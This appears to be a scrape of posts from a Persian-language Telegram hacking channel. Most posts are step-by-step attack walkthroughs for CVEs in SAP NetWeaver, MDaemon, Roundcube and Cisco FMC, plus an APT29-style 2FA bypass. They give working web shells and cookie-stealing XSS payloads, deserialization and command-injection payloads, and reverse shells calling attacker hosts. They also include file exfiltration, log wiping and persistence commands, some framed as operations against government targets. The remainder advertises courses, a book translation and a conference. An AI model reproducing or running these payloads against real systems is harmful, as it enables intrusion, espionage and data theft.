$files = Get-ChildItem -Recurse -Path "C:\Engineering\ReactorDesigns\" -Include *.docx,*.pdf,*.dwg
Compress-Archive -Path $files.FullName -DestinationPath "C:\Temp\export.zip"
Invoke-WebRequest -Uri "http://203.81.99.37/upload" -Method POST -InFile "C:\Temp\export.zip"

🔹 حذف ردپا و حفظ حضور (OPSEC & Persistence)
👈 تکنیک‌ها:
⬅️ ایجاد Scheduled Task با نام جعلی:

schtasks /create /tn "Chrome Update" /tr "C:\Users\Public\chrome_upd.exe" /sc minute /mo 30

⬅️ پاک‌کردن لاگ‌های سیستم:

wevtutil cl Security

⬅️ حذف فایل‌های لاگ دراپر:

del /F /Q "C:\Users\*\AppData\Local\Temp\~*.log"

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

⏲ گروه مرتبطی با چین با اسم Chaya_004 از آسیب‌پذیری بحرانی CVE-2025-31324 تو SAP NetWeaver سوءاستفاده کرده‌. این آسیب‌پذیری تو ماژول Visual Composer و به طور خاص تو سرویس MetadataUploader با مسیر /developmentserver/metadatauploader قرار داره. این سرویس قراره فایل متادیتا رو برای توسعه‌دهنده‌ها آپلود کنه. اما SAP یه اشتباه مرگبار کرده: این endpoint بدون هیچ نوع authentication بازه!
این endpoint به راحتی فایل‌ رو با متد POST دریافت و روی سیستم ذخیره می‌کنه، بدون بررسی اینکه کاربر کیه. حالا اگه فایل آپلودی یه اسکریپت .jsp باشه، SAP NetWeaver اون رو به عنوان یه asset داینامیک لود می‌کنه و روی سرور اجرا می‌کنه!

👈 یعنی چی؟ یعنی:

POST /developmentserver/metadatauploader HTTP/1.1
Host: target-victim.com
Content-Type: multipart/form-data; boundary=boundary

--boundary
Content-Disposition: form-data; name="file"; filename="shell.jsp"
Content-Type: application/octet-stream

<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>
--boundary--

👈 بعدش فقط کافیه بری:

http://target-victim.com/VCService/shell.jsp?cmd=whoami

و تمام! کد روی سرور اجرا می‌شه.

🔹 مرحله دوم: پیاده‌سازی دقیق - Exploit Chain
👈 گام 1: Uploading JSP Web Shell

curl -X POST http://victim.com/developmentserver/metadatauploader \
  -F "file=@shell.jsp" -H "Content-Type: multipart/form-data"

محتوای shell.jsp:

<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
Process p = Runtime.getRuntime().exec(cmd);
BufferedReader reader = new BufferedReader(new InputStreamReader(p.getInputStream()));
String line = null;
while ((line = reader.readLine()) != null) {
    out.println(line);
}
%>

👈 گام 2: اجرای کد از راه دور

curl "http://victim.com/VCService/shell.jsp?cmd=cat /etc/passwd"

🔹 مرحله سوم: Persistence با SuperShell
بعد از اکسپلویت چی نصب کردن؟ یه reverse shell به سبک GoLang به اسم SuperShell. این ابزار مثل Cobalt Strike ولی سبک‌تر و stealthتره.
👈 ویژگی‌های جالب SuperShell:
⬅️ یک. Cross-platform (Linux/Windows)
⬅️ دو. TLS encrypted reverse shell
⬅️ سه. فایل single-binary، قابل بارگذاری از طریق همین RCE
⬅️ چهار. با قابلیت اجرای دستور، TTY interactive، فایل آپلود و دانلود
👈 شِل رو چطوری نصب کردن؟
فایل .jsp یه curl یا wget ساده میزنه به سرور CDNشون و فایل Golang shell رو دانلود می‌کنه:

<%
String[] cmd = {"/bin/sh", "-c", "wget http://malicious.cn/supershell -O /tmp/sshell; chmod +x /tmp/sshell; /tmp/sshell &"};
Runtime.getRuntime().exec(cmd);
%>

🔹 زیرساخت و C2 Network
هکرها فقط یه RCE ساده نزدن، کل ساختار حمله شبیه یه kill-chain پیشرفته‌ست:
⬅️ یک. Recon: ابزارهایی مثل ARL و Pocassist برای پیدا کردن سیستم‌های SAP آسیب‌پذیر
⬅️ دو. Exploit: استفاده از CVE-2025-31324 با اسکریپت curl/python
⬅️ سه. Payload: بارگذاری SuperShell via .jsp
⬅️ چهار. C2: Tunnel کردن ترافیک از طریق SoftEther VPN و NPS (یه reverse proxy چینی)
⬅️ پنج. Persistence: ابزارهایی مثل Go Simple Tunnel یا Cobalt Strike برای backdoorهای پایدار
⬅️ شش. Evade: رمزنگاری ارتباط، تغییر مسیر DNS، و فایل‌های اسمی نامفهوم مثل ssonkfrd.jsp

🔹 تحلیل نهایی: چرا این حمله خاصه؟
⬅️ یک. Zero Auth RCE روی یک ERP حیاتی مثل SAP یعنی نفوذ به قلب سازمان.
⬅️ دو. حمله کاملاً قابل اتوماسیون با ابزارهای PoC آماده‌ست.
⬅️ سه. Golang payloads مثل SuperShell باعث میشن آنتی‌ویروس‌ها گیج بشن؛ چون فایل باینری ناشناخته‌ست.
⬅️ چهار. استفاده از ابزارهای open-source و چینی باعث میشه شناسایی APT سخت‌تر بشه.

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

⏲ گزارش عملیاتی – Exploiting CVE-2024-11182 in MDaemon Webmail
🧊 نفوذ به زیرساخت‌های دولتی با سوءاستفاده از یک Zero-Day در MDaemon

🔹 شناسایی قربانی
👈 ما به دنبال اهدافی در حوزه حاکمیتی (Government & Defense) بودیم که همچنان از زیرساخت‌های قدیمی وب‌میل استفاده می‌کنند. ابزارهای Recon مورد استفاده:
Shodan + Censys:

shodan search 'http.noscript:"MDaemon Webmail"' country:"RO"

👈 تأیید با whatweb و nmap:

whatweb http://mail.target.gov.ro
nmap -sV -p 3000-9000 mail.target.gov.ro

نتایج نشان داد که چندین هدف در اوکراین، رومانی و قبرس از نسخه‌های آسیب‌پذیر MDaemon Webmail استفاده می‌کنند (نسخه‌های قبل از 24.5.1).

🔹 تحلیل آسیب‌پذیری زیرودی CVE-2024-11182
آسیب‌پذیری XSS Reflected در پارامترهای سمت کلاینت در فرم پاسخ‌دهی ایمیل:
👈 پارامتر آسیب‌پذیر:

POST /WorldClient.dll?View=Compose&Action=ReplyTo
Content-Type: application/x-www-form-urlencoded

body=<img src=x onerror="fetch('https://attacker.com/x?'+document.cookie)">

هنگام مشاهده پاسخ ایمیل توسط کاربر، کد JS اجرا می‌شود. اجرای کد در context دامنه MDaemon باعث سرقت session cookie و دسترسی به اینترفیس وب‌میل می‌شود.

🔹 آماده‌سازی حمله - Weaponization
👈 ایجاد ابزار JavaScript payload generator:

let payload = `
fetch('https://c2-server.evil/steal', {
  method: 'POST',
  body: JSON.stringify({
    cookies: document.cookie,
    ua: navigator.userAgent,
    loc: window.location.href
  })
});
`;

👈 محتوا را در ایمیل HTML اینجکت کردیم:

<img src=x onerror="${payload}">

🔹 ارسال ایمیل - Delivery
👈 ارسال از دامنه جعلی شبیه وزارت کشور:

spoof-mail.py --from 'gov@ministry.gov.ua' --to 'employee@target.gov.ro' \
--subject 'وضعیت اضطراری ملی' --html-file payload.html

ایمیل‌ها از طریق SMTP سرور open relay در آفریقا ارسال شدند. از محتوای فریبنده با عنوان "یادداشت امنیت ملی فوری" استفاده کردیم.

🔹 اجرای موفق کد مخرب - Exploitation
👈 با باز شدن ایمیل، کوکی‌های قربانی به C2 ما ارسال شدند:

Cookie: auth_session=dkj34k2j4k2j34k23j4
User-Agent: Mozilla/5.0 (Windows NT 10.0)

👈 از آنجا وارد پنل Webmail شدیم:

curl -b "auth_session=..." https://mail.target.gov.ro/WorldClient.dll?View=Inbox

🔹 استخراج داده‌های حساس - Credential Extraction
👈 لیست ایمیل‌ها، credentials و 2FA tokenها در فایل‌های قابل مشاهده سمت سرور ذخیره شده بودند:

GET /WorldClient.dll?View=Settings&Folder=Passwords
GET /WorldClient.dll?View=2FA&Export

👈 استخراج تنظیمات SMTP/IMAP برای pivot:

SMTP Host: smtp.target.gov.ro
IMAP User: admin@target.gov.ro
IMAP Pass: ********

🔹 ماندگاری در سیستم - Persistence
👈 ایجاد App Password مخفی (ویژگی MDaemon برای دسترسی API):

POST /WorldClient.dll?View=AppPassword&Create
Body: name=devtool&pass=VeryLongAppToken123

ذخیره Token در vault تیم مهاجم برای بازگشت در آینده.

🔹 زیرساخت C2
👈 سرور C2 بر بستر Cloudflare Tunnel تنظیم شد.
👈 دامنه: update-drive-storage[.]net
👈 ترافیک ارسالی به شکل encoded JSON over HTTPS:

{ "cookies": "...", "2fa": "...", "imap": "...", "metadata": "..." }

🔹 ابزارهای استفاده‌شده:
✅ Recon: Shodan, WhatWeb, Nmap
✅ Delivery: SpoofMail.py, Phishery
✅ Exploit: Custom JS Payload
✅ Persistence: AppToken Abuse, Cookie Hijack
✅ Extraction: CURL, Python IMAP Tool
✅ Infra: Cloudflare Tunnel, DNS Over HTTPS (DoH)

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

⏲ تحلیل آسیب‌پذیری CVE-2025-49113
🧊 یه آسیب‌پذیری بحرانی تو Roundcube Webmailاه که به هکرها بعد از احراز هویت امکان اجرای کد از راه دور (RCE) روی سرور رو می‌ده. تو ادامه جزئیات اون رو بررسی می‌کنیم.

🔹 هدف:
سروری با Roundcube Webmail (مثلاً نسخه 1.6.9) که دارای حساب‌های کاربری معتبر و دسترسی از طریق اینترنت است.

🔹 مرحله 1: شناسایی هدف
👈ابزار: nmap, httpx, whatweb, wappalyzer, dirsearch.
👈خروجی:

$ whatweb mail.victim.com
mail.victim.com [200 OK] Roundcube, PHP, Apache, Country[US], Title[Welcome to Roundcube Webmail]

$ curl https://mail.victim.com/roundcube/ | grep Version
<meta name="generator" content="Roundcube Webmail 1.6.9">

🔹 مرحله 2: دستیابی به حساب کاربری
از اونجایی که آسیب‌پذیری بعد از احراز هویت عمل می‌کنه، نیاز به یه حساب داریم:
⬅️ یک. Credential stuffing با پسوردهای لو رفته
⬅️ دو. Social engineering برای گرفتن دسترسی کاربر
⬅️ سه. استفاده از credential leak سازمانی

Username: john@victim.com
Password: Company2023!

👈 ورود موفق از طریق /roundcube/?_task=login

🔹 مرحله 3: بهره‌برداری از CVE-2025-49113
👈 فایل upload.php تو مسیر:

/program/actions/settings/upload.php

پذیرای پارامتر POST به اسم _fromاه که بدون اعتبارسنجی deserialize می‌شه. ما با ساخت یه آبجکت PHP مخرب، کد دلخواه رو روی سرور اجرا می‌کنیم.

🔹 مرحله 4: ساخت payload PHP Object Injection
👈 سناریو: Roundcube از لایبرری‌هایی مثل PEAR یا Symfony بهره می‌گیره، و خیلی از کلاس‌های اون قابلیت magic method مثل __destruct()، __wakeup() یا __toString() دارن.

class Exploit {
    public $cmd;

    function __destruct() {
        system($this->cmd);
    }
}

$exploit = new Exploit();
$exploit->cmd = "curl http://attacker.com/shell.sh | bash";
$serialized = serialize($exploit);

👈 مثال خروجی:

O:7:"Exploit":1:{s:3:"cmd";s:33:"curl http://attacker.com/shell.sh | bash";}

🔹 مرحله 5: ارسال درخواست مخرب

POST /roundcube/?_task=settings&_action=upload HTTP/1.1
Host: mail.victim.com
Cookie: roundcube_sessid=SESSIONID

Content-Type: multipart/form-data; boundary=----XYZ
Content-Length: ...

------XYZ
Content-Disposition: form-data; name="_from"

O:7:"Exploit":1:{s:3:"cmd";s:40:"wget http://attacker.com/rev.sh -O- | bash";}
------XYZ
Content-Disposition: form-data; name="userfile"; filename="fake.txt"
Content-Type: text/plain

(fake content)
------XYZ--

🔹 مرحله 6: Reverse Shell
👈 فایل rev.sh محتوای زیرو داره:

#!/bin/bash
bash -i >& /dev/tcp/attacker.com/4444 0>&1

👈 تو سمت مهاجم:

nc -lvnp 4444

🔹 مرحله 7: Post Exploitation
⬅️ کارهایی که حالا می‌شه انجام داد:
⬅️ سرقت فایل‌های ایمیل کاربرا از /var/lib/roundcube/
⬅️ خوندن فایل‌های پیکربندی حاوی DB creds (config/config.inc.php)
⬅️ پیوت به سیستم‌عامل با privilege escalation
⬅️ نصب backdoor دائمی

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

#پادکست
🎤 اپیزود 88 رادیو امنیت - صدایی از تاریکی: ماجرای گنجشک درنده - یازدهم تیر 1404
💠 بررسی حمله سایبری به بانک سپه

⬅️ لینک CastBox
https://castbox.fm/vd/823884810

⏩ CyberWarfar

⏲ خبری اومد که گروه APT29 یا همون Cozy Bear که وابسته به سازمان اطلاعات خارجی روسیه‌اس، از روش‌های خیلی پیچیده برای دور زدن احراز هویت دومرحله‌ای استفاده کرده و تونسته به حساب جیمیل افراد تارگت دسترسی پیدا کنه. اینجا می‌خوام این خبر رو از دید فنی بررسی کنیم:

🧊 جزئیات فنی کمپین APT29 برای دور زدن 2FA
👈 هدف اصلی:
حساب‌های جیمیل کارمندای نهادهای دولتی، دیپلمات‌ها، مؤسسات تحقیقاتی، و اهداف استراتژیک تو کشورهای غربی، به‌ویژه تو آمریکا و اتحادیه اروپا.
👈 روش حمله:
گروه APT29 با ارسال ایمیل‌های فیشینگ هدفمند، قربانی رو به صفحاتی فیک هدایت می‌کنه که شباهت زیادی به صفحات لاگین واقعی گوگل دارن. اما نکته کلیدی اینجاست: حتی اگه قربانی احراز هویت دو مرحله‌ای (مثلاً کد SMS یا اپلیکیشن احراز هویت) رو وارد کنه، مهاجم همچنان می‌تونه دسترسی کامل بگیره.
👈 استفاده از App Passwords برای دور زدن 2FA:
گوگل به کاربرا اجازه می‌ده برای اپلیکیشن‌هایی که از احراز هویت دو مرحله‌ای پشتیبانی نمی‌کنن، یه "رمز عبور اپلیکیشن" (App Password) تولید کنن. این رمز، یک‌بار مصرفه و نیازی به وارد کردن کد 2FA نداره.

🧊 تحلیل فنی کمپین APT29
🔹 سناریو کلی
👈 هدف: دستیابی به حساب‌های جیمیل کارکنای دولتی، دیپلمات‌ها، محققان و اعضای نهادهای استراتژیک
👈 تکنیک کلیدی: فیشینگ هدفمند + session hijacking یا credential harvesting + تولید App Password پس از ورود موفق

🔹 مرحله 1: شناسایی هدف
👈 ابزارها:
⬅️ یک. Maltego / SpiderFoot برای جمع‌آوری اطلاعات سازمانی
⬅️ دو. LinkedIn Scraping (ابزارهایی مثل osintLinkedinScraper) برای شناسایی نقش‌ها و ایمیل‌های هدف
⬅️ سه. Hunter.io / Email Permutator برای ساختن لیست ایمیل‌ها
👈 تکنیک‌ها:
⬅️ جمع‌آوری دامنه‌های مورد استفاده سازمان
⬅️ استخراج MX Recordها برای بررسی استفاده از Google Workspace
⬅️ پیدا کردن آدرس‌های ایمیل مرتبط با افراد مهم سازمان

🔹 مرحله 2: ایجاد زیرساخت
👈 ابزارها:
⬅️ یک. C2 Frameworks: Cobalt Strike / Sliver / Mythic برای Post-Exploitation
⬅️ دو. Phishing Kits: Evilginx2 / Modlishka / Muraena برای حملات MITM روی صفحات لاگین گوگل
👈 نکات کلیدی:
⬅️ استفاده از دامنه‌هایی مشابه دامنه اصلی سازمان (typosquatting)
⬅️ تنظیم HTTPS با Let's Encrypt برای اعتبار ظاهری
⬅️ راه‌اندازی Reverse Proxy با Evilginx2 برای جمع‌آوری real-time session cookies

🔹 مرحله 3: اجرای حمله فیشینگ
👈 تکنیک‌ها:
⬅️ ارسال ایمیل از طریق سرورهای SPF/DMARC معتبر یا compromise شده برای دور زدن فیلترها
⬅️ استفاده از محتوای فیشینگ شخصی‌سازی‌شده (مثلاً: درخواست آپدیت رمز عبور، اطلاعیه امنیتی از طرف گوگل)
👈 ابزار ارسال:
⬅️ یک. GoPhish
⬅️ دو. King Phisher
👈 هدف:
⬅️ تارگت وارد صفحه جعلی بشه، رمز و 2FA Token خودش رو وارد کنه. Evilginx2 این اطلاعات رو تو لحظه ثبت می‌کنه و از اون برای لاگین واقعی استفاده می‌کنه.

🔹 مرحله 4: دور زدن 2FA و ایجاد App Password
👈 روش 1: MITM + Session Hijack
⬅️ با Evilginx2، Token فعال از قربانی دریافت می‌شه (cookie hijacking)
⬅️ مهاجم بدون نیاز به رمز یا 2FA، وارد صفحه تنظیمات گوگل می‌شه

👈 روش 2: Credential Harvesting + Real-Time Login
⬅️ اگه قربانی سریعاً بعد از ورود اطلاعات به صفحه فیک، اونا رو تأیید کنه، مهاجم بلافاصله وارد اکانت شده و به تنظیمات می‌ره.

👈 تو تنظیمات:
⬅️ ایجاد App Password از مسیر:
Google Account → Security → Signing in to Google → App passwords
⬅️ وارد کردن یه اسم جعلی مثل Outlook-Sync یا Mobile-Login
⬅️ دریافت رمز عبور ۱۶ کاراکتری یک‌بار مصرف و استفاده از اون تو اتصال‌های IMAP

🔹 مرحله 5: استخراج دیتاها و ماندگاری
👈 ابزارها:
⬅️ یک. Thunderbird / Outlook + IMAP plugin برای خوندن ایمیل‌ها با App Password
⬅️ دو. IMAPSync / OfflineIMAP برای بک‌آپ کامل
⬅️ سه. Google Takeout API abuse اگه سطح دسترسی اجازه بده
👈 روش‌های ماندگاری:
⬅️ ایجاد فیلتر برای فوروارد مخفیانه ایمیل‌ها
⬅️ مخفی‌سازی لاگین از طریق device rename یا IP proxy
⬅️ افزودن recovery email جدید در صورت امکان

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

سلام. وقت بخیر دوستان.
اگر از دوستان کسی آمادگی رکورد دوره‌های آموزشی شامل حوزه امنیت، برنامه‌نویسی (مرتبط با امنیت) و شبکه رو داره (بصورت حضوری تو دفتر لیان با استفاده از تجهیزات مدرن)؛ می‌تونیم از طریق پیام خصوصی بنده، بیشتر در مورد جزئیات صحبت کنیم.
ضمنا اگر کسی رو هم می‌شناسین که امکان همکاری براشون فراهم هست، لطفا پیام بنده رو براشون ارسال کنین.
ارتباط از طریق آی‌دی:
@vahid_elmi

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

⏲ سناریوی سوءاستفاده از CVE-2025-20265 در Cisco FMC

1. شناسایی (Reconnaissance)
🔹 هکر ابتدا شبکه هدف رو اسکن می‌کنه تا Cisco FMC رو شناسایی کنه:
⬅️ ابزارها:

nmap -sV -p 443,1812,1813 <target>

اسکن روی پورت‌های 443 (Web UI) و 1812/1813 (RADIUS Authentication)
⬅️ خروجی:

PORT     STATE SERVICE VERSION
443/tcp  open  https   Cisco Secure FMC WebUI
1812/udp open  radius
1813/udp open  radius-acct

وجود سرویس RADIUS روی FMC تأیید شد.

2. آماده‌سازی Payload (Exploit Development)
🔹 مشکل اصلی تو ماژول RADIUS Authentication Handlerاه. ورودی‌های یوزرنیم و پسورد مستقیماً به یه دستور shell پاس می‌شن.
⬅️ اکسپلویت: Command Injection از طریق Username یا Password.
⬅️ ابزار تست: radtest (از FreeRADIUS package).
نمونه دستور برای تست:

radtest "attacker; id;" password <FMC_IP> 1812 secret

اگه آسیب‌پذیر باشه، خروجی RADIUS شامل اجرای دستور id خواهد شد و تو لاگ‌ها یا پاسخ RADIUS مشاهده می‌شه.

3. اجرای Remote Code Execution (Initial Access)
🔹 مهاجم به جای دستور ساده، از payload برای دریافت reverse shell استفاده می‌کنه:
⬅️ نمونه Payload:

radtest "user; bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'" pass <FMC_IP> 1812 secret

⬅️ ابزار مورد استفاده:
ابزار netcat روی سیستم مهاجم (nc -lvnp 4444) برای دریافت shell.
نتیجه: مهاجم یه Root Shell روی FMC به دست می‌آره.

4. تثبیت دسترسی (Persistence)
🔹 پس از دسترسی اولیه، مهاجم اقدامات زیر رو انجام می‌ده:
⬅️ یک. افزودن کلید SSH برای دسترسی دائمی:

mkdir -p /root/.ssh
echo "ssh-rsa AAAAB3..." >> /root/.ssh/authorized_keys

⬅️ دو. ایجاد Cronjob برای Beacon ارتباط:

echo "* * * * * root curl http://ATTACKER_IP/beacon.sh | bash" >> /etc/crontab

⬅️ سه. نصب Agent برای Cobalt Strike Beacon یا Sliver C2:

curl -o /tmp/beacon http://ATTACKER_IP/beacon && chmod +x /tmp/beacon && /tmp/beacon &

5. حرکت جانبی (Lateral Movement)
🔹 از اونجایی که FMC مرکز مدیریت تموم Firepowerهاست:
⬅️ مهاجم می‌تونه پالیسی‌ها رو تغییر بده تا فایروال‌های مرزی ترافیک C2 یا بدافزار رو بلاک نکنن.
⬅️ ابزارهایی مثل psql (برای دسترسی به دیتابیس PostgreSQL FMC) یا scp برای انتقال فایل‌ها استفاده می‌شه.
مثال: استخراج credential ذخیره‌شده تو FMC:

psql -U admin fmcdb -c "SELECT username,password FROM users;"

6. بهره‌برداری نهایی (Actions on Objectives)
🔹 پس از تسلط کامل روی FMC:
⬅️ باز کردن ACLها برای ورود و خروج ترافیک مهاجم.
⬅️ خاموش‌کردن یا تغییر IPS Signatures برای جلوگیری از شناسایی.
⬅️ استقرار بک‌دور روی همه فایروال‌ها با deploy پالیسی آلوده.

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

🔵راهنمای تیم آبی در مواجه با این آسیب‌پذیری
🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

وقتی اولین بار این کتاب رو دیدم، بیشتر از هر چیزی حس کردم لازمِ این روایت به زبان فارسی منتقل بشه. نه برای اینکه بگیم بقیه اشتباه کردن، بلکه چون این کتاب یه زاویه‌دید و دسترسی مستند به بخشی از دنیای سایبر میده که کمتر توی منابع فارسی به شکل منسجم و قابل‌فهم وجود داشته. به همین دلیل با دکتر رحیمیان تصمیم گرفتیم این اثر رو با دقت ترجمه کنیم تا هر کسی (چه متخصص باشه، چه مدیر، چه دانشجو یا فقط کنجکاو) بتونه ازش بهره ببره.

این کتاب، نوشته نیکول پرلروث، گزارشی عمیق و پرجزئیاته از بازار پنهون خرید و فروش آسیب‌پذیری‌های زیرو-دی، برنامه‌های دولتی برای توسعه جنگ‌افزارهای سایبری و رقابت بین قدرت‌ها برای برتری تو فضای دیجیتال. پرلروث سال‌ها به‌عنوان خبرنگار امنیت سایبری کار کرده و از مصاحبه با بازیگران مختلف این میدون (از هکرها و دلالای آسیب‌پذیری نرم‌افزاری تا مقامات دولتی) روایت‌هایی میاره که هم تکون‌دهنده‌ست و هم هشداردهنده.

ما توی ترجمه سعی کردیم دو چیز رو هم‌زمان داشته باشیم: دقت فنی و روون بودن متن. یعنی هم اصطلاحات تخصصی درست منتقل بشه و هم متن طوری روون شده که خواننده حتی اگه از اول با واژه‌ها آشنا نباشه، با جریان کتاب همراه بشه و خسته نشه. نتیجه این شده که این نسخه مناسبِ مدیرها، پژوهشگرها، دانشجوها، تیم‌های امنیت و هر کسی که می‌خواد بفهمه دنیاهای پشت پرده‌ی تهدیدات سایبری چه‌طور کار می‌کنن باشه.

چرا باید این کتاب رو بخونین؟
چون نشونه‌های روشنی میده از اینکه تهدیدات سایبری دیگه محدود به هک‌های ساده و سرقت اطلاعات نیستن؛ این تهدیدها می‌تونن زیرساخت‌ها رو فلج کنن، سیاست‌ها رو تحت‌تأثیر بذارن و در سطح بین‌الملل ابزاری از جنس قدرت بشن. خوندن این کتاب کمک می‌کنه دید استراتژیک‌تری نسبت به مدیریت ریسک، سرمایه‌گذاری تو امنیت و برنامه‌ریزی دفاعی پیدا کنین.

این ترجمه رو انتشارات فناوران لیان (وابسته به گروه لیان) منتشر کرده و من و دکتر رحیمیان با تعهد کامل روی صحت و انتقال پیام کتاب کار کردیم. اگه دنبال یک منبع قابل‌اعتنا و درعین‌حال جذاب برای درک عمیق‌ترِ جنگ‌افزارهای سایبری هستین، این کتاب یه انتخاب ضروریه.

ضمنا برای 50 خرید اول کد تخفیف 25% لحاظ شده که می‌تونین از طریق لینک زیر و با کد تخفیف book-25، کتاب رو تهیه کنین:
https://liangroup.net/shop/This-Is-How-They-Tell-Me-the-World-Ends

ضمنا حتما بعد از مطالعه کتاب بهم فیدبک بدین.

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

چند وقتی هست به دنبال برگزاری منظم همایش تخصصی حوزه امنیت هستم. تقریبا یک سالی هم هست روی هزینه‌ها تحقیق کردم و با ارتباطاتی که با دانشجوها و مخاطبین حوزه داشتم، بازخورد خوبی از این موضوع گرفتم.
به دلیل هزینه بالای برگزاری همچین رویدادهایی، تو اولین قدم یک فراخوان عمومی منتشر می‌کنم برای جذب اسپانسر که جزئیات این طرح اسپانسری به همراه امکانات جانبی، لیست شده. امیدوارم بتونیم با اسپانسری شرکت‌ها این همایش رو بصورت سالانه و با کیفیت و ارائه اساتید برتر حوزه امنیت سایبری برگزار کنم.

ضمنا جذب اسپانسر به دلیل رایگان کردن حضور افراد علاقمند به حوزه امنیت هست.

لطفا در صورت امکان این پست رو شیر کنین یا اگر شرکت‌هایی می‌شناسین که توانایی اسپانسری همچین رویدادی رو دارند، براشون ارسال کنین.

با تشکر.

شماره تماس برای جزئیات بیشتر: 09209104151

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar